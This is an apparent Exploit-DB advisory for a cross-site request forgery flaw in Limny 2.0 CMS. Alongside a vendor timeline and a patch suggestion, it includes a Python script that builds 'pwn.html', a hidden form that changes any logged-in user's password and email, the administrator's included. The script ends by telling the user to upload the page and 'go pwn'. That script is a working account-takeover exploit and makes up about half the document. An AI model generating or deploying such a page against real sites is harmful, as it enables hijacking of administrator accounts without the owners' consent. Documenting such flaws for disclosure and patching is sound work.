Limny 2.0 - Cross-Site Request Forgery (Change Email and Password)

EDB-ID:

11477




Platform:

PHP

Date:

2010-02-16


/¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯\
:Limny 2.0 Change Pass CSRF   :  
\____________________________/
/Discovered By:              \ 
|Luis Santana                 |
\____________________________/

Overview
~_¯~_¯~_¯~_¯~~_¯~_¯~_¯~_¯~_¯~_¯~
The Limny 2.0 CMS is vulnerable to a Cross-Site-Request Forgery exploit which allows for a malicious attacker to change the password, and email address, of any user, including the administrator.

Product Information
~_¯~_¯~_¯~_¯~~_¯~_¯~_¯~_¯~_¯~_¯~
Product/Script: Limny CMS
Affected Version: 2.0

Vulnerability Type: CSRF
Security Risk: High

Vendor URL: http://www.limny.org/
Product/Script Demo: http://demo.opensourcecms.com/limny

Vendor Status: Informed
Patch/Fix Status:
Advisory Timeline: 02/16/10 : Vulnerability found, PoC created and vendor contacted
		              Update: Vendor has started working on patch.
                              Update: A Patch has been created

Advisory URL:

Product Description
~_¯~_¯~_¯~_¯~~_¯~_¯~_¯~_¯~_¯~_¯~
Limny is a powerful, module-based and lightweight CMS. It is programmed in PHP and uses MySQL database. 

Vulnerability Details
~_¯~_¯~_¯~_¯~~_¯~_¯~_¯~_¯~_¯~_¯~
By crafting a simple hidden form webpage with a simple javascript form auto-submitter hidden inside of an iframe an attacker is able to change the password, and email address of any user.

Proof of Concept
~_¯~_¯~_¯~_¯~~_¯~_¯~_¯~_¯~_¯~_¯~
See included .zip file for unweaponized (you need to click the "Save" button for the exploit to launch) PoC

Patch/Fix Suggestion(s)
~_¯~_¯~_¯~_¯~~_¯~_¯~_¯~_¯~_¯~_¯~
Implementing form cookies and checking for HTTP Referer would provide an adequate means of patching this vulnerability.

Security Risk
~_¯~_¯~_¯~_¯~~_¯~_¯~_¯~_¯~_¯~_¯~
This vulnerability is estimated to have a HIGH security risk.

Author:
~_¯~_¯~_¯~_¯~~_¯~_¯~_¯~_¯~_¯~_¯~
The Author and Researcher of this Advisory is Luis Santana of the HackTalk Security Team

'''
Limny 2.0 Change Email & Password CSRF Exploit
Discovered By: Luis Santana
Script By: Luis Santana
HackTalk.net

Shoutz to the Evilzone.org community, Shardy, Rage, Xires and Stacy
'''

__version__= 1.0

p = open("pwn.html", "w")
p.write('''<html>
<head>
<title>Limny2.0 Change Password & Email CSRF by Luis Santana
</head>
<body>
<h1>Press Save and Pwn Away</h1>
''')
base = str(input("What is the target website? "))
p.write('<form name="profile" action="')
p.write(base)
p.write('''/?q=user" method="post" enctype="multipart/form-data">
''')
password = str(input("What password do you want? "))
p.write('''<table>
<td><input name="pass" type="hidden" maxlength="64" value="''')
p.write(password)
p.write('''" /></td></tr>
<td><input name="confirmpass" type="hidden" maxlength="64" value="''')
p.write(password)
p.write('''" /></td></tr>
<tr><td colspan="2"><hr size="1" /></td></tr>
<tr><td>Theme:</td><td><select name="theme"><option value="gray" selected="selected">Gray</option></select></td></tr>
<tr><td>Language:</td><td><select name="language"><option value="english" selected="selected">English</option></select></td></tr>
<td><input name="email" type="hidden" maxlength="128" value="'''
email = str(input("What email do you want? "))
p.write(email)
p.write('" /></td></tr>')
#This will change the email address of the administrator but there is no way to get around it
p.write('''<td><input name="picture" type="hidden" value="" /></td></tr>
<tr><td colspan="2"><hr size="1" /></td></tr><tr><td colspan="2"><button name="submit" type="submit">Save</button></table></form>
</body>
</html>''')
p.close()
print("pwn.html has been created successfully! Upload this file to your webserver and then go pwn")